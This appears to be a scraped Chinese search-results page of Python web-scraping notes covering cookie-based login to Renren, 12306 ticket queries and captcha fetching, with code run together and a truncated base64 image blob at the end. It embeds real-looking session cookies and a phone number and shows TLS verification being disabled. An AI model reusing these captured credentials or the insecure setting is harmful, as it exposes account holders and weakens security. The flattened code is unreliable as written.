[同步读取JSON数据的Nodejs方法]的搜索结果

...具有服务器身份验证和数据传输加密功能 在爬虫时可能会遇到这样的报错（SSLError）这说明我们要爬取的网站没有SSL证书 处理：res = requests.get(url,verify=False) 二、cookie 通过记录用户信息来确定身份 1 模拟登陆 人人网保持登陆状态import requestsurl = 'http://www.renren.com/976686556/profile' 个人主界面headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.128 Safari/537.36','Cookie':'anonymid=knvqe21amc6ghy; depovince=ZGQT; _r01_=1; taihe_bi\_sdk_uid=c2bd353cea6830a73eb74760fbc9fd5c; taihe_bi_sdk_session=9a91c\62f18e74ee26c3145bb49b4eb9e; ick_login=286c45d0-e571-4fb7-918a-46a9706\18110; first_login_flag=1; ln_uact=17315371375; ln_hurl=http://head.xiao\nei.com/photos/0/0/men_main.gif; wp_fold=0; jebecookies=ee811760-7bc0-43a9-\883c-0d041cb1baf0|||||; _de=A4C6B1A20CD5F525F9DA27654C2D2FDA; p=f5239823cd0af743a5f015652568b6036; t=42783075a815b6cef9f651ca18ff5c166; societyguester=42783075a815b6cef9f651ca18ff5c166; id=976686556; xnsid=f72459d7; ver=7.0; loginfrom=null'}res = requests.get(url,headers=headers) res 响应对象 html = res.textwith open('rr.html','w',encoding='utf-8') as file_obj:file_obj.write(res.text) 2 反反爬机制 12306查票import requests import json json.loads -- json类型的str -> python类型的字典def query():headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.128 Safari/537.36','Cookie':'_uab_collina=159490169403897938828076; JSESSIONID=090F384AC50BE0F1AFA3892BE3F6DBE9; _jc_save_wfdc_flag=dc; _jc_save_fromStation=%u957F%u6C99%2CCSQ; _jc_save_toStation=%u5317%u4EAC%2CBJP; RAIL_DEVICEID=bbXqzYOPTc-SPgujxnGkCBr9t3sq0JQoMSYUdg-FxjyQ5IkfcPCNoreXmBAIh2HSrM9Z9awDR5onIQwy4EZ8pAhaGXWYBAH6etIlFc4dyxLudz525GAcRgVX5HLIxOE1orODUNSb9wvTBAJptPms1z5Pz5K6FXES; RAIL_EXPIRATION=1619479086609; _jc_save_toDate=2021-04-23; BIGipServerpool_passport=182714890.50215.0000; route=6f50b51faa11b987e576cdb301e545c4; _jc_save_fromDate=2021-04-26; BIGipServerportal=3067347210.16671.0000; BIGipServerotn=1725497610.50210.0000'}response = requests.get('https://kyfw.12306.cn/otn/leftTicket/query?leftTicketDTO.train_date=2021-\04-26&leftTicketDTO.from_station=CSQ&leftTicketDTO.to_station=BJP&purpose_codes=ADULT',headers=headers) print(response.content.decode('utf-8'))return response.json()['data']['result']for i in query(): print(i)tem_list = i.split('|') 定义一个标记 给每个数据做个标记 j = 0 技术特别 for n in tem_list: print(j,n) j += 1 通过以上的测试我们知道了 列出是下标索引为3的数据 软卧是下标索引为23的数据if tem_list[23] != '无' and tem_list[23] != '':print(tem_list[3],'有票',tem_list[23])else:print(tem_list[3],'无票') 三、session Session与cookie功能效果相同。Session与Cookie的区别在于Session是记录在服务端的，而Cookie是记录在客户端的。 由于cookie 是存在用户端，而且它本身存储的尺寸大小也有限，最关键是用户可以是可见的，并可以随意的修改，很不安全。那如何又要安全，又可以方便的全局读取信息呢？于是，这个时候，一种新的存储会话机制：session 诞生了 突破12306验证码import requestsreq = requests.session() 保持会话def login(): 笔记本 win7 python3.6 获取验证码图片pic_response = req.get('https://kyfw.12306.cn/passport/captcha/captcha-image?login_site=E&module=login&rand=sjrand')codeImage = pic_response.contentfn = open('code2.png','wb')fn.write(codeImage)fn.close() 从验证码图片的左上角 (0,0)codeStr = input('请输入验证码坐标:')headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.128 Safari/537.36'}data = {'answer': codeStr,'rand': 'sjrand','login_site': 'E'}response = req.post('https://kyfw.12306.cn/passport/captcha/captcha-check',data=data,headers=headers)print(response.text)login() base64伪加密 根本不算是一种加密算法 只不过它的数据看上去更像密文而已 64个字符来表示任意的二进制数据的方法 使用 A-Z A-Z 0 - 9 + / 这64个字符进行加密 import base64url = '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